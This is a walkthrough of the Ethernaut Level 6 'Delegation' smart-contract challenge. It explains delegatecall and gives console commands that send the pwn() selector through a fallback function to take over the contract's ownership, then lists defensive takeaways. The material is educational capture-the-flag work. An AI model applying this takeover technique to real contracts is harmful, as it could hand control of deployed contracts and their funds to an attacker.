Skip to content

Latest commit

 

History

History
97 lines (68 loc) · 3.22 KB

06_Delegation.md

File metadata and controls

97 lines (68 loc) · 3.22 KB

(back)



Ethernaut Level 6 - Delegation


Read the article directly on my blog: Ethernaut Solutions | Level 6 - Delegation

Table of Contents

Goals

The hack

This level want us to understand the danger of using Delegate calls in a smart contract. Delegate Calls are a powerful tool that allows a contract to delegate a function call to another contract. This is a very useful feature when building upgradable contracts, but it can also be very dangerous if not used correctly.

Basically, a delegate call is a low-level function that allows another contract to execute a function using the storage of the calling contract. This means that the delegate contract can modify the state of the calling contract.

Example

If contractA executes delegatecall to contractB, contractB's code is executed with contractA's storage, msg.sender and msg.value.

In this Ethernaut level, the Delegation contract (contractA in the previous example) has a fallback function that delegates the call to the Delegate contract (contractB).

fallback() external {
    (bool result,) = address(delegate).delegatecall(msg.data);
    if (result) {
      this;
    }
  }

By using a delegatecall to the pwn function, we will update the owner of the Delegation contract.

NOTE: The storage slot order also plays an important role when using delegate calls. But will we explore this in the next levels. Here, since both contract only have one state variable, we don't need to worry about it.

Solution

(In the browser's console)

  1. Let's start by getting the selector of the pwn() function:
const pwnSelector = web3.utils.keccak256("pwn()").slice(0, 10);
  1. Then, call the Delegation contract's fallback function with the pwn() function selector:
/**
 * @param {string} from - Your wallet address.
 * @param {string} to - Delegation instance address.
 * @param {string} data - The selector of the pwn() function: "0xdd365b8b".
 */
await web3.eth.sendTransaction({
  from: player,
  to: instance,
  value: "0",
  data: pwnSelector,
});
  1. You can call the owner() function to check if the hack was successful:
await contract.owner();

Takeaway

  • Use extreme caution when using delegate calls in your smart contracts.
  • Make sure to understand the implications of using delegate calls and the potential security risks.
  • Delegate calls should not accept untrusted inputs.

Reference

Parity Wallet Hack: https://blog.openzeppelin.com/on-the-parity-wallet-multisig-hack-405a8c12e8f7/


🎉 Level completed! 🎉